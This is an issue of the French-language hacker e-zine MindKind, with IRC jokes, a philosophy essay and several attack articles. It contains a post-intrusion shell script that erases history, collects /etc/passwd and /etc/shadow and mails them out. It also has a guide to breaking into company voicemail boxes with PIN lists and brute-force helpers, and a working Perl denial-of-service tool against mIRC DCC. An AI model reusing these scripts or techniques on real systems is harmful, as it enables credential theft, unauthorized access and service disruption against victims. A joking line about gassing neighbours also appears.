   [20:44] <BiosLudge> :)
   [20:44] <BiosLudge> yetais sur openbsd
   [20:46] <BiosLudge> bas ca ch po mais mon ami ya po eu dla misere
   [20:46] <BiosLudge> pis ya 13 ans
   [20:46] <init_null> ouais ouais. jsupose qui code en asm.
   [20:46] <init_null> pis qui sait voler.

  < ----------------------- >
  
  
  
                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| In the middle of nowhere, by Wyzeman                      / 10.3   /
'          aka: no where, not now here                     .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/


Contempler ce qui  vous  entour,  ce que vous possdez,  ce  que
vous trouvez beau. Incrustez les dans  les  moindres  dtails  a
l'intrieur de votre cerveau,  car  il  n'existe pas. Maintenant
oublier tout ce que vous savez ou croyez savoir, oublier jusqu'
mme  votre  existant car tout ceci est vain, vous n'existez pas
plus. Vous ne me croyez pas ? Lisez ce  texte,  il  explique  ce
qu'est en fait la vie (bref ce qu'elle n'est pas).


L'antithse du nant, ou le nant qui n'existait pas.

Par dfinition, le nant, est l'absence  de toute chose. a tout
le monde est d'accord sur ce point. A partir de ce point il  est
relativement facile d'expliquer que le nant ne peu pas  exister
et je ne serai probablement pas  le  premier    le faire.  Mais
laissez moi vous l'expliquer tout de mme. au premier degrs, on
peu conclure, que puisque  le nant est l'absence de toute chose
et est donc en lui  mme,  rien,  pas  mme  du  vide car a  le
ferais tre, donc il ne serait plus nant. De plus  le nant  ne
peut pas avoir de limite, car ses limites donneraient une  forme
au nant, donc le rendraient quelque chose, (rien  avec de  quoi
autour) bref, pour que le nant puisse  tre  il  faudrait qu'il
n'existe rien ce qui n'est manifestement pas le cas puisque nous
existons (oui je sais que cette phrase est en contradiction avec
ce que j'ai dit au  dbut,  mais  attendez  plus  loin  avant de
chialer) et finalement, le nant ne pourrait pas exister car  le
simple  fait d'exister le ferait tre quelque chose, ce qu'il ne
peu pas tre, vous saisissez? Bon  quoi a rime tout a avec le
fait que notre monde n'existe pas ?  rien pour l'instant, c'est
pourquoi nous allons poussez un peu notre rflexion sur le nant
en ajoutant une preuve supplmentaire qu'il ne peut  exister  en
se basant sur le concept de la dualit des choses.  quel  est ce
concept ? et bien  c'est  le  fait  qu'une chose ne peu  exister
sans sont contraire. ex: la vie ne peu pas exister sans la mort,
pour quel raison me direz vous ? et  bien,  la vie perd toute sa
signification si la mort n'existe pas  puisque  le  propre de la
vie c'est d'tre ce qui n'est pas mort. donc si la mort n'existe
pas, la vie ne peu pas tre ce qui n'est pas mort. cette thorie
est simple lorsqu'on fait  face  a  des concepts dont nous avons
trouver des mots pour  designer leur contraire, mais quel est le
contraire du rouge ? on serais porter  a  rpondre  le bleue (le
bleu  est  toujours  opposer  au  rouge)  mais  ce  n'est qu'une
perspective  car  l'absence  de bleue n'empche en rien le rouge
d'exister ou vice versa. le contraire du  rouge  n'est  donc pas
une autre couleur,  mais l'absence de rouge. Donc si on applique
a au  nant. le contraire du nant est la totalit de  ce   qui
existe, pour des raisons de simplicit j'utiliserais le  concept
religieux de la cration pour dsigner l'ensemble de tout ce qui
existe. Donc, pour que le nant existe, la cration doit exister
mais si la cration existe, le  nant  ne  peu  exister  car  il
annihilerais par le fait la cration, donc sans la  cration  le
nant n'existerait pas non plus, car il  perdrais  le  contraire
qui lui permet d'exister. Par contre, la  cration  ne  peut pas
exister sans le  nant,  et  si  le  nant  existe  la  cration
n'existe pas (c'est le mme principe  du  point  de  vue  de  la
cration). Donc avec ou sans le nant, la cration  ne  peu  pas
exister elle ne peut mme pas ne pas exister  car  pour  ne  pas
exister on doit tre mais elle n'est mme pas, elle est du nant
qui ne  peut  exister  non  plus  pour  les  raisons  expliques
prcdemment. Donc la cration  qui  est  tout  ce  qui  existe,
n'existe pas, car  si  elle  existait le  nant existerait  donc
nous n'existerions  pas  puisque  nous sommes quelque  chose  et
nous  ne  pourrions tre au centre du nant(ou  quelques points
que se soit (ce qui est ridicule puisque  aucun  point  ne  peut
exister dans le nant)) ou sinon nous ne pourrions  partager  de
l'espace avec le nant ce qui l'auto dtruirait  par le paradoxe
de son incapacit  tre quelque  chose.  (On  pourrait  tourner
longtemps  en  rond comme a sans arriver nul par).  Conclusion,
nous n'existons pas car notre contraire est incapable d'exister.


la multiplexion de la ralit

Cette  thorie  se  base  sur  la subjectivit de la  perception
humaine,   On  pourrais   parler   de   la   sophistication   de
l'humanit :]. Comme la prouver Einstein, l'univers est  relatif
c'est  dire que les choses  sont  diffrentes  dpendamment  de
notre point de vue. (ex : la vitesse est un concept ridicule  si
on a aucun point de repre, en effet,  quel  est  la  diffrence
entre faire du sur place au milieu  de  nul  par  ou  d'aller  a
299 000km/h dans le mme nul par (en prenant compte qu'il n'y  a
aucune gravite). le poids tant relatif a la gravite causer par
une masse plus importante, etc.. et comme vous allez me dire que
la relativit gnral peu  pas  exister,  puisque  si  tout  est
relatif rien n'est absolue,  donc  sans absolue la relativit ne
peu pas exister, je vous rpondrais que le fait  que  tout  soit
relatif est un absolue :] (probablement le seul d'ailleurs).Donc
les sophistes croyais que la vrit ne pouvais tre le propre de
l'tre humain et  qu'il  tait  incapable  d'y  accder, Socrate
tait contre, mais a bien y penser, il ne s'agit que  d'un point
de vue diffrent. Et Einstein nous a dmontrer qu'on pouvais pas
tre sur de  rien  (enfin, on peu tre sur que rien n'est sur et
encore la, tout es sur selon notre point de vue, mais  toute  la
vrit peu tre fausse,  puisque  vu  diffremment  (genre qu'on
aurais pu arriver au mme  niveau  avec  des  points  de  repre
diffrent, enfin  on  a  pris ceux qui nous tais humainement le
plus comprhensible (sauf p-e pour la physique quantique et  les
lection canadienne)).Donc  a  la  noirceur  de  ce  text,  nous
pouvons dire qu'il existe autant de ralit que gens qui peuvent
les  percevoir,  plus  le  point  de  vue  de  personne (la vrai
ralit  telle  que  tout c'est vraiment pass. autant d'univers
parallle  qui  reprsente  l'univers des  possibilits,  et  le
chemin de la vrit fait  sont  choix    travers  l'infini   de
possibilit a chaque seconde dpendamment des actions de chacun.
2 problme sorte de cette thse, la premire est qu'on  est  peu
tre pas du tout dans  la  ralit  (genre  qu'on  est juste une
possibilit parmi tant d'autre  qui  aurais  pu tre vrai).   Le
2eme est que l'infini + 1 (ce que personne peroit)  a  se peut
pas, alors,  a  ne  nous laisse le choix que de ne pas exister,
puisque  notre  existence dans la ralit  n'est  pas   possible
puisque la ralit  de l'infini + 1  est  impossible   (a  rend
aussi le  premier problme farfelu et grotesque puisque comme on
existe pas, on ne peut pas tre dans la mauvaise ralit. 


la redondance de l'espace temps

Vous connaissez sans doute l'impression de  dj  vu. La thorie
populaire veut que a se produise lorsque vous vous trouvez   en
contact avec  un  lieu que vous avez dj visiter lors d'une vie
antrieur, ou  alors  que cette effet soit le rsultat d'un rve
prmonitoire. Il n'en est rien.  Vous  tes  peu tre au courant 
des thories qui vise  a  prvoir  statistiquement  l'avenir  en 
analysant le pass. en effet, la connaissance de l'histoire sert
a  viter  les  mmes  erreurs,  pourtant  on  y  prte trs peu
attention (ainsi Hitler fi la mme erreur que napolon). 

Vous vous tes srement dj senti dans l'incapacit de  changer
les choses, de devoirs subir un  quelconque destin, et  ce  mme
si  vous  l'aviez  prvu  d'avance  (un amour impossible, ne pas
gagner a la loto). Bref toute les tentatives que vous  auriez pu
faire, les messes voodoo,  les  sacrifices  de  brebis  n'aurons
servit a rien, ce qui  devais  arriver  arriva  (vous  avez  pas
gagner le gros lot, la fille sort encore avec sont  chum,  etc).
Avec un minimum d'introspection et de recul  vous  vous  rendrez
srement compte que vous saviez d'avance ce qui allais se passer
pourtant il ne s'agissait  pas  d'un  rve prmonitoire ou d'une
situation  vcu  dans  une  vie  antrieur.  Pourtant  l'analyse
statistique de l'histoire porte  en  votre  faveur  (les  amours 
magique et impossible ne fonctionne jamais (ces pourquoi on  les
appelle amour impossible) et ya juste des ptit vieux qui gagne a
loto quebec, c'est bien connue. Si vous  analyser votre vie mme
vous vous rendrez compte que ce  n'est pas  la  premire foi que
vous  vivez  un  vnement   semblable.   La   fille   ressemble 
probablement a  votre  premire  amour,  tudie srement dans un
domaine connexe, etc, a  vous  de  voir. Un test intressant  en
ce sens    faire  sur  l'acide  est  d'couter la tlvision et
d'essayer de comprendre le message secret vous allez vous mettre
a entendre toute les mots qui repasse souvent comme s'il faisait
partie d'une phrase coder. Ensuite penser  toute les choses que
vous faites dans une journe, et  vous  allez vous rendre compte
que vous tournez souvent en  rond.  la  terre  est  ronde,  elle
tourne autour du soleil sans  arrt,  tout  dans l'univers n'est
qu'un ternel recommencement.  D'ailleurs  vous  allez  srement 
relire  cette  article  puisque  vous  avez  probablement  rien 
comprit.

						

 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | Wyzeman                             wyzeman@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|



        ____         ,-------------------------------------------------
       /    \        | Vous venez de prendre le root (sur une de vos
      |  _   |       | machine bien sur) et vous desirez lidentifier  
      | / \  |       | rapidement pour savoir en quoi consiste finalement
      ||   | |      /  ce qui vien de vous tomber sous les mains (heu
      (.) (.)|     /   c'est pas supposer etre votre box ?!?). Voici
      ||   | |    <__  un shellscript de MindFlayR qui fait bien la job
      ||   | | |     |
      ||   | | |     |#!/bin/sh
      |____/|| |     |# USAGE: ./lick.sh your@mailadress.com 
      |\___/ | |     |export HISTFILE=/dev/null 
      ||   | | |     |chmod 0 /root/.bash_history
      ||   | | |     |echo MindFlayR lame infograbber camel killer v1.01
      ||   | | |     |echo please wait until script get all info needed  
      ||     | |      echo after, simply check your mail
      | \___/  |      PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
      |        |      touch /tmp/lick
       \______/       chmod 0 /tmp/lick       
                      echo "--==lick results by MindFlayR==--" >> /tmp/lick
                      echo "--==box's hostname==--" >> /tmp/lick
                      hostname >> /tmp/lick
                      echo "--==get host info==--" >> /tmp/lick
                      ifconfig -a >> /tmp/lick
                      echo "--==uname -a result==--" >> /tmp/lick
                      uname -a >> /tmp/lick
                      echo "--==CPU power==--" >> /tmp/lick
                      cat /proc/cpuinfo >> /tmp/lick
                      echo "--==RAM info==--" >> /tmp/lick
                      cat /proc/meminfo >> /tmp/lick
                      echo "--==/etc/passwd file==--" >> /tmp/lick
                      cat /etc/passwd >> /tmp/lick
                      #fix for bsd, comment out next 2 line and comment the 2 others
                      # echo "--==/etc/master.passwd file==--" >> /tmp/lick
                      #cat /etc/master.passwd >> /tmp/lick
                      echo "--==/etc/shadow file==--" >> /tmp/lick
                      cat /etc/shadow >> /tmp/lick
                      echo "--==last time users logged==--" >> /tmp/lick
                      lastlog >> /tmp/lick
                      echo "--==Net Connection Information==--" >> /tmp/lick
                      netstat >> /tmp/lick
                      echo "--==current process==--" >> /tmp/lick
                      ps -aux >> /tmp/lick
                      echo "--==message of the day==--" >> /tmp/lick
                      cat /etc/motd >> /tmp/lick
                      echo "--==issue==--" >> /tmp/lick
                      cat /etc/issue >> /tmp/lick
                      mail -s "$1" < /tmp/lick
                      rm -rf /tmp/lick
                      echo EOF

 
                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| Hack a Vocal Message Box, by c4ndu                        / 10.4   /
'          aka: Vmb, thats it, thats all                   .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/

Beaucoup d'entrer vous vont rires de se texte, et j'pourrais meme
aller jusqu'a dir que vous allez lol'ez de plein coeur,  ce   qui
en soit ne m'affecte pas reellement, puisque je suis  un  rockeur
au coeur tendre. (expression voler de  TQS/TVA/SRC qui  parle  du 
gars  qui manque  2-3 jambes et un bras  pis  qui  chante).  Tout 
d'abord,   qu'est-ce  que  se  texte  a  pour  but ?  bof,  c'est 
relativement   simple  :  faire  circuler  l'info underground qui
touche le phreaking par l'entremise  de  PFA  ou d'une publicitee
a TVA vers  3  heures du matin.  Pour  dire  vrai,  etant  donner 
qu'on va parler de plein  coeur des VMB, ceci a pour but de  vous
expliquez,  le  plus  en  detail  possible  (en tenant compte que
tout ne sera pas dit, puisque j'suis pas un elite cool dude), les 
systemes de  VMB. Pourquoi, au debut,  j'ai dis que beaucoup vont
rire ? parce que de 1, deja beaucoup  de  txt/ezine  on parler de
VMB, et de 2, un peu plus loin, dans le  texte, vous aurez  droit
a  une  liste  des  pass  de  4 chiffres les plus commun; ce qui,
pour certains, ne serait qu'une facon d'avoir  lair elite.  Ainsi
va la vie ;)

Tout d'abord, qu'est-ce qu'une VMB ? et farceur comme tu  es,  tu
voudra surment un exemple. Ne vous inquitez pas,  vous  en  aurez  
un.  Une  VMB, Voice Message Box,  est un  simple  repondeur  qui
sert aux  employers d'une  compagnie  a  recevoir  des  messages,
et en envoyer. Pour avoir access, comme employer (bleh),  a votre 
VMB  personne, une key doit etre  entrer,  ensuite  un  password.
C'est, en effet,  la  suite de l'histoire.  Maintenant  vous etes 
kewl  a  mort,  vous s'avez  ce   qu'est   une   VMB,   et  votre 
comportement  enfantin  vous  donne  le  gout  d'en  hacker  une.  
Votre permiere  objectif  est  de vous en trouvez une (vous aurez
quelques technique de scan un peu plus creux dans le texte). Pour
les besoins de la cause, voici un exemple de VMB: 1-800-200-1350.
La 1ere chose a faire c'est  d'ecouter  attentivement  le message
d'entrer. Comme mentionner sur la VMB, vous devez tapper  *  pour 
envoyer une  message  a  quelqu'un. La premiere  etape,  sois  la 
plus simple, et des trouvers  la  key  qui  nous  permes d'entrer 
le numeros de  box / password.  Si vous ecoutez  bien  le message 
d'entrer de la VMB,  vous   s'aurez   quoi ne pas essayer. (comme
l'exemple de la VMB nous le dit, on peut deduire que *  n'est pas
une  option,  puisqu'elle (l'etoile)  sert a envoyer un message a 
une personne en particulier. Certaines  VMB  peuvent  peut - etre
vous dires quelle key entrer,   sinon  essayer  le  #   et  *  en
premier lieux;  ensuite, de 0 a 9;  puis  faite des compinaisons. 
Bref, vous s'aurai surment  le trouver. Nous sommes donc rendu au
numeros de box.Diferentes techniques s'offre a nous, donc une  de
moi, et une autre que j'ai trouver sur le site web  de  Phreakon. 
Ma  technique (je dis "ma", mais elle doit surment etre  employer  
par  d'autres ...)  consiste   a  avoir   plus  de  possibilitees 
d'entrer de "numeros de box", je m'explique : reprenons l'exemple
de la VMB de tentot, la key pour avoir  access au  login  est  le
#, et ensuite  il  vous demande le numeros  de box, mais avec une
limite de 3 essaies. Donc c'est relativement difficile de trouver
la serie des numeros de box (serie ? bof,  si  un  numeros de box
est le 1, la serie pourrait etre de  1  a 9  (exemple)). Bref, ma 
technique consiste a avoir une plus grande possibilitee d'entrer,  
et  c'est  la  qu'il  devient important de bien ecouterle message 
d'entrer de la VMB.  Comme  dans  l'exemple,  le  message  de  la 
VMB nous dit que pour envoyer un message a quelqu'un, nous devons
appuiyer sur le *.  Mais  de  la,  apres  avoir  peser  le *,  il 
nous  demande  le  numeros de  boite de la personne a laquel vous
voulez laisser un message. Et a cette instant, souvent,  une plus 
grande possibilitee  d'entrer nous sont donner pour trouver notre
serie de numeros de boites. 

Voici le truc donner sur le site web de Phreakon :

http://www.chez.com/phreakon/pbx/vmb.html

" Sur certaines VMB, vous tapez le premier chiffre du n de vmb 4
  et la femme vous dit rien. Vous passez au 2eme chiffre du n de
  vmb  5  et la femme  ne  vous  dit rien. Continuez avec un 6 et
  la elle vous dit un truc (n incorrect)  c'est que 456* nexiste
  pas.  La VMB sera donc dans  la   forme  45**  (4500    4599).
  Continuez !.  4500, 4501, [..], 4546 -->  Veuillez entrer votre
  mot de passe. "

Y'a toujours du SE qui ne peut pas nuire,  surtout si vous tomber
sur une telephoniste  durant le jour. Il ne vous reste plus  qu'a 
cracker le password.  (nous  parlerons du scan un peu plus loin).
Beaucoup  de  VMB,  pratiquement  tous,  on  des  passwords  a  4
chiffres.  Cela  fait  dont 10000 possibilitees. Je vous donne un  
petit  script  mIRC  qui  vous  rempli  dans  un  .txt  la  liste 
complete  des  passwords a  4 chiffres,  et  nous  parlerons  des 
passwords par la suite : 

PS: lire plus bas avant d'executer le script.

dans "alias" :

pass {
  var %i = 0

  while (%i < 10000) {
    if ( %i < 10 ) {
      //write pass.txt 0 $+ 0 $+ 0 $+ %i
    }
    elseif ( %i < 100 ) {
      //write pass.txt 0 $+ 0 $+ %i
    }
    elseif ( %i < 1000 ) {
      //write pass.txt 0 $+ %i
    }
    elseif ( %i < 10000 ) {
      //write pass.txt %i
    }
    inc %i
  }
}

Le   tout   sera   saver  dans  un  txt  apeller  pass.txt situer
dans  votre folder mIRC.  Je  vous  averti  d'avance,  cela  peut
prendre  quelques minutes  (pendant  ce temps,  mIRC va freezer).

J'vous   donne    le  droit  de  rire  du  mirc  script.  (rire).
(prolongement).  (feni).  Vous  vous demandez surment pourquoi le 
ptit  script  fefi  qui  agremante  un  party   de  chip   en  un  
party  de  l33ts   superfriendly  ?   envoyez  vos   demande   au
1-800-777-7777,  moi jvais me contentez de finir le texte :)

Vous l'avez surment remarquer, essayer 10000 n'est pas conseiller
Et jpas ici pour vous le conseiller.  Mais de cette  liste,  sans
moi,  vous  saurez  surment  sortir  quelques  passwords qui vous
semblent utilent. Je vais le faire pour moi-meme un peu plus loin
dans le texte,  et vous pourrez surment vous situer entre  les  2 
extremitees, ou les deux memes points.

De cette liste, voici donc les passwords  a  essayer par default.

1111
2222
3333
4444
5555
6666
7777
8888
9999

1000
2000
3000
4000
5000
6000
7000
8000
9000

0001
0002
0003
0004
0005
0006
0007
0008
0009

1234
4321

1122
2211
3344
vous voyez le genre ?

Regarder bien le clavier de votre phone :

1 2 3
4 5 6
7 8 9

159* ou 951*
753* ou 357*

123*
456*
789*

147*
258*
369*

Autre password a essayer :

Date de naissance du proprietaire (SE);
Boite vocale 1223, password 1223; 
Boite vocale 123, password 123* ou *123;
Numeros de telephone locale; 
   *   comme  l'exemple de tentot,  notre  vmb  est  disponible 
       au 1-800-200-1350,  mais  aussi  au  506-546-6621, donc on 
       peut essayer comme password le 6621 :)
Numeros 1-800 de la VMB;
   *   avec 1-800-200-1350, on peut essayer 1350, ou meme 0531.
Nombre de smurf dans un champignion.


--- 2ieme partie mal devisee ---


La 1ere chose a faire  avant de commencer a essayer de hacker une
VMB, est d'en trouver une.  Et  la  facon  la  plus  probable  et
efficace est le scan. Bon,  ici  vous allez me dire que vous avez  
entendu parler  d'un wardial  pis blablablabla, je vous repondrai 
sans  esiter  de  vous  crissez  l e wardial dans le cul  pis  de 
tourner  en  rond (ca fait un etourdissement  rectorielle). Donc, 
vous  auriez  du  conclure qu'un meilleur  scan est fait avec une
main droite (jsuis anti-gauchier), et un telephone pluger.  Avant 
de scanner, trouver une classe de numeros a scanner.

exemple : 1-800-888-99xx

donc 100 possibilitee de numeros, sois le :

1-800-888-9901
1-800-888-9902
1-800-888-9903
etc
jusqu'a 1-800-888-9999

La  technique  que  j'utilise  est d'ecrire  la liste des numeros 
complets  dans un .txt,  et  d'ecrire  a  cotee de chaque numeros
ce que celui-ci signifie. En d'autre mots, au lieux de  le  faire
a  cotee  des  mots croisees dans le journal,  savez  le  dont en
.txt pis faite s'en beneficier les autres.

exemple:

1-800-888-9901 ; rien
1-800-888-9902 ; boite vocale normal, # pour se loger.
1-800-888-9903 ; VMB
1-800-888-9904 ; sex line (10min de pause obligatoir).

Bon,  etant  trop  lache  pour ecrire chaque numeros dans le .txt
avec mes propres doigts,  j'ai scripter un ptit mIRC  script  qui 
le fait pour moi.  Ce script n'est pas un wardial ou whatever  ce
que  vous avez en tete,  mais  simplement  une facon d'avoir dans
un .txt une  classe  de  numeros 1-800 pour ensuite les scanner a
la main.

scan {

  var %i = 0
  /.remove scan01.txt
  
  while (%i <= 99) {
    if (%i < 10) {
      //write scan01.txt %num01 $+ 0 $+ %i
    }
    else {
      //write scan01.txt %num01 $+ %i
    }
    inc %i

  }

}

Je  l'ai fait aussi un peu plus  userfriendly, mais  j'ai  penser
bon vous  donnez  la  version elite101 :).  Donc,  vous setter la
classe de numeros  que  vous  voulez  scanner  en   fesant   /set
%num01 1-800-444-32 sans  mettre  les "x".  Ensuite  vous  tapper  
/scan,  et  le  resultat se retrouve   dans   un   texte   nommer 
scan01.txt,  savez  dans  votre folder mIRC.  (ici je suppose que 
vous voulez scanner 1-800-444-32xx).

quand et ou  scanner ?  premierement,  imaginons  nous  que  vous 
avez trouver une  vmb  au  1 800 999 4444,  et  que  vous  l'avez 
contacter vers 2 heures du matin. Si vous essayer le meme numeros
de jour, vous risquez peut etre de tomber sur  une  telephoniste,
et  le  numeros  pour  avoir access a la vmb le jour et  la  nuit 
pourrait   etre  quelque  chose  comme  1 800 888 4443.  Donc  le 
mieux, pour mettre les chances de notre  cotees  est  de  scanner
apres 11 heure - minuit,  ou  kekchose  du  genre. Pour lendroit, 
je vous conseille fortement de tuer vos  voisins  et  de  scanner
dans   leur   maison.   Un  bon  truc  pour  tuer  ses   voisoins  
inconito   est  de  mettre  du  gaz  dans leur cendrier.  (coquin 
suis-je).  Serieusement,  je  pourrais  vous  conseiller  d'allez
scannez  dans  un  payphone  puisque  je  tient  enormement  a la
securitee des lecteurs de  mindkind, mais bon ...

							

    ___
   |___|__
   '  --_     En revenant de rigou, aprout, kabi, catou, pif ...
   C    _)  /
    \ =/      
    //'      
   (_)\                       
   | | \            
   | |__)           
   ;\/||           
   |  ||     
   |__||_   
   |___)_) 



 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | c4ndu                                 c4ndu@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|




   < Mindkind tales from IRC >
   
  [11:09] <init_job> Saglac
  [11:09] <init_job> haha
  [11:09] <init_job> saglac.qc.ca
  [11:09] <LastCall_> saglac.qc.ca
  [11:09] <LastCall_> hahaha
  [11:09] <LastCall_> y va devenir le main provider
  [11:09] <LastCall_> au qubec
  [11:10] <LastCall_> genre yon une fibre optique plugger sur un
                      ornement en forme de fleur qui fait dla lumire
  [11:10] <LastCall_> hahahah
  [11:10] <LastCall_> HAHAHA
  [11:10] <zarath> lol
  [11:10] * LastCall_ se roule a terre

  < ----------------------- >


                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| Pseudo reverse engineering a la cocainoman, by [Funky]    / 10.5   /
'          aka: Ces comme de lingenirie mais a lenvers     .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/

Si vous etes du genre a vous servir uniquement de ce que vous avez coder, par
crainte de vous faire fourrer par des backdoor, trojan, ou virus implanter
dans des petits prog disponible globalement en toute les langues imaginable, ou
que vous n'avez jamais fait de programmation socket sous perl. Cet article
pourrait possiblement vous etre utile. Le tout est base sur un DOS courant
visant Mirc, dcc-lock... rien de fortement pratique mais je crois que l'exemple
laisse tout de meme place a l'imagination et que la technique est asser versatile
pour etre digne d'interet.

Je voulais d'abbord savoir sur quel port il etait actif. Un netstat -a, a fait 
l'affaire, et a donner le resultat suivant:

--------------------------------------------------------------
<snip>
TCP    winbox:4501            WINBOX:0               LISTENING
TCP    winbox:4502            WINBOX:0               LISTENING
TCP    winbox:4503            WINBOX:0               LISTENING
TCP    winbox:4504            WINBOX:0               LISTENING
TCP    winbox:4505            WINBOX:0               LISTENING
</snip>
--------------------------------------------------------------

Il ouvrait donc 5 port, qui fesait un truc X. Pour justement trouver ce truc X.
J'ai d'abbord juste connecter avec telnet le port 4501, en esperant trouver
la raison qui motivait dcc-lock de l'ouvrir. 

------------------------------Telnet Dump c/p-------------------------------
__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.
__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.__0.
----------------------------------------------------------------------------

Le tout etait repeter a l'infinie, et j'ai utilise le ASCII char 254 dans mon
article uniquement pour demontre que telnet resolvait pas les 2 premiers chars.
et que le tout avait juste l'air de des carres vide.plustard j'ai trouver 
exactement ce qu'ils etaient reelement...mais bon j'y viens. Apres ces premier
resultat, je croyais que la seul chose qui me restait a faire etait de coder
un truc qui attendait une connection sur le port 4501 et qui crachait une
infinite de "0." des qu'elle etait etablit. Premier echec, un DCC s'ouvrait,
rien de plus. Je me suis dit qui me manquait probablement un charactere genre
CRLF ou un truc du genre. La deuxieme etapes logique etait de coder un deuxieme
truc qui se connectait sur le port 4501 et qui sniffait ce qui sortait a l'etat
pure (donc pas de probleme d'interpretation de char) et qui  dumpait le tout
dans un fichier. Le code du basic sniffer est a la fin de cette article. 

Vue la repitions evidente de la meme structure de 4 chars, j'ai juste prit 5 lignes 
de ce que le port 4501 me donnait, question de voir en meme temps si y'avais pas au 
debut des trucs protocolaires, ca m'etonerais, mais je pouvais pas le voir avec telnet.


----------------------------Resultat du sniff/dump---------------------------
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.
-----------------------------------------------------------------------------

La raison de mon premier echec, etait donc que j'avais pas les bon chars
et que j'avais pas mit de carriage return a la fin...heh...Mais au moin
le tout avancait dans la bonne direction. Il ne me restait plus qu'a coder
un truc qui ne fait qu'emettre en continue exactement ce que le pseudo-sniffer
avait enregistre des qu'une connection etait etablit sur le port, pour avoir
un prog fonctionelle qui ferait sa job, pas juste idler..

Et...ce fut le cas, la cible est morte en ~2mins, le monde qui etait vulnerable
au veritable dcc-lock, l'etait autant avec mon truc. Finalement en copy/pastant
les resultat du sniff/dump dans une box de mirc par erreur, j'ai vu la simplicite
du pseudo exploit qu'est dcclock...-> CTRL-B, CTRL-K, 0, point <- 25 fois de
suite suivit d'un carriage return... hah... jme suis donc empresser d'ecrire 
la version finale, qui est aussi inclut a la fin de cette article.

En conclusion, il est souvent tres facile de decouvrir ce qu'un code fait sans avoir
necessairement access au code source, que ca soit par pure curiosite ou pour comprendre
exactement comment un application et/ou exploit marche a la base, en utilisant la technique
que j'ai utilise dans cet article, ou un veritable sniffer...uhm...p-e que je vais
en parler dans un prochain article.


-=[ Sources du basic sniffer ]=-

#!/usr/bin/perl
# Basic Sniffer, utiliser pour dcc-lock, Libre a vous de le modifier, prendre les
# credits pour...j'en ai strictement rien a foutre ;)

use IO::Socket;
use strict;

my $socket = IO::Socket::INET->new( PeerAddr => 'votreip', # votreip != variable
                                    PeerPort => '4501',
                                    Proto    => 'tcp', ) || die "Can't Bind.\n";

open FiLe, ">>sniff.rez";
for(1..5) { 
   my $line = <$socket>;
   print FiLe $line;
}

#eof

-=[ Source du dcc-lock final ]=-

use IO::Socket;        
use Getopt::Std;       
use strict;            


my %argv;
getopts('p:z', \%argv); 
&usage if(!defined($argv{p}));


my $line = "0.";       #CTRL-U,CTRL-B, CTRL-K, 0, POINT
                          #^------amilioration minime.

my $socket = IO::Socket::INET->new( LocalHost => 'votreip',
                                    LocalPort => $argv{p},      
                                    Proto     => 'tcp',        
                                    Listen    => '1',         
                                    Reuse     => '1',         
                                  ) || die "FawK#!@";

print qq!
c/p in Mirc:
--------------------------------------------------------------------
//raw privmsg NICK : \$+ \$chr(001) \$+ DCC CHAT chat \$longip(\$ip) $argv{p}
--------------------------------------------------------------------

Use CTRL-C to stop..this is low-tech...heh.
!; 

my $focus_sock = $socket->accept()    
while(1) {print $focus_sock $line x 25 . "\n";}

sub usage
{
die <<EOF

Invalid Syntaxe
----------------

perl dcclock.pl -p <port>

EOF
}

# eof


							[Funky]


 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | [funky]                               funky@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|




  < Chez Mindkind, nos passwords sont cherchs par 10 trisomiques
     mitaines qui tappent sur des VIC-20                        >


                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| Internet esspliqu, by LastCall_                          / 10.6   /
|          aka: ma esspliquer a drette net sec c'est quoi .  ----- /
'            yaka: ma vulgariser a, stie.                 /       /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/

Un jour, je me suis retrouv face  face avec Internet.  Je  lui  ai  dis  :
"ok, je veux t'utiliser". Ya faite "ok", et je l'ai utilis. Un  autre  jour
je me suis retrouv en arrire d'Internet, et ce aprs l'avoir  regard  par
en face pendant plus de 5-6 ans... j'ai eu un choc. Ce qui tait  pour  tre
simpliste  la base, ft compliqu... et j'ai laiss tomber... y'avait  rien
d'intressent  lire. Vous savez ces RFC ou bien ces cours d'universit  sur
Internet, ben c'est platte... tu peux pas rien pratiquer,  pis  t'a pas  une
note sur 100 pour ton effort (aucun reward!). Sauf qu'un jour,  je  me  suis
retrouv face  face avec une tonne d'quipement (je parle pas de tracteurs,
mais de routeurs) et je me suis amus(certain apelle a travailler ;-) avec.

Voici donc la fin de l'intro vous pouvez commencer  lire la :

Level 1
Internet c'est un paquet de fils. Jusque la, on s'entend pour dire que c'est
simple. Sauf qu'Internet c'est un batard de gros criss de  paquet  de  fils.
La a devient plus compliqu (et vulgaire).

Level 2
Le paquet de fils est plugg ensemble. vidamment y'a du data qui passe  par
les fils. 0 et 1 sont les seules choses qui existent (c'est simple :-).

Level 3
Internet c'est une srie de routes de gauche  droite.  D'o  vient  le  mot
